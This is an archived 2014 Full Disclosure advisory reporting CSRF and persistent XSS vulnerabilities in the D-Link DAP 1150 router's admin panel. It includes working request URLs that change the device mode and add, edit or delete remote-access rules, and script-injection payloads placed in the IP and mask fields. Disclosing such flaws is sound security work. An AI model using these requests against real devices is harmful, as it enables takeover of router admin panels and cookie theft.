[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Multiple CSRF and XSS vulnerabilities in D-Link DAP 1150
From:       "MustLive" <mustlive () websecurity ! com ! ua>
Date:       2014-04-28 20:29:24
Message-ID: 007001cf6320$9d015fd0$9b7a6fd5 () pc
[Download RAW message or body]

Hello list!

In 2011 and beginning of 2012 I wrote about multiple vulnerabilities 
(http://securityvulns.ru/docs27440.html, 
http://securityvulns.ru/docs27677.html, 
http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozens). 
That time I wrote about vulnerabilities in admin panel in Access Point mode 
and now I'll write about holes in Router mode.

I present new vulnerabilities in this device. There are Cross-Site Request 
Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi 
Access Point and Router).

SecurityVulns ID: 12076.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This 
model with other firmware versions also must be vulnerable. D-Link ignored 
all vulnerabilities in this device (as in other devices, which I informed 
them about) and still didn't fix them.

----------
Details:
----------

I remind you, that in the first report about vulnerabilities in D-Link DAP 
1150 (http://securityvulns.ru/docs27440.html), I wrote about CSRF in login 
form and other vulnerabilities, which allow to remotely log into admin panel 
for conducting CSRF and XSS attacks inside admin panel.

CSRF (WASC-09):

In section Advanced / Device via CSRF it's possible to change device mode. 
If access point mode is on, then for attack on vulnerabilities in router 
mode it's needed to turn on this mode.

Turn on access point mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0


Turn on router mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0


CSRF (WASC-09):

In section Advanced / Remote access  via CSRF it's possible to add, edit and 
delete settings of remote access to web interface. The next request will 
allow remote access to admin panel from IP 50.50.50.50.

Add:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_co \
nfig_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1


Edit:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_co \
nfig_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0


Delete:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0


XSS (WASC-08):

These are persistent XSS. The code will execute in section Advanced / Remote 
access.

Attack via add function in parameter res_buf (in fields: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_co \
nfig_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script% \
3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1


Attack via edit function in parameter res_buf (in fields: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_co \
nfig_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script% \
3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0


I mentioned about these vulnerabilities at my site 
(http://websecurity.com.ua/7137/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic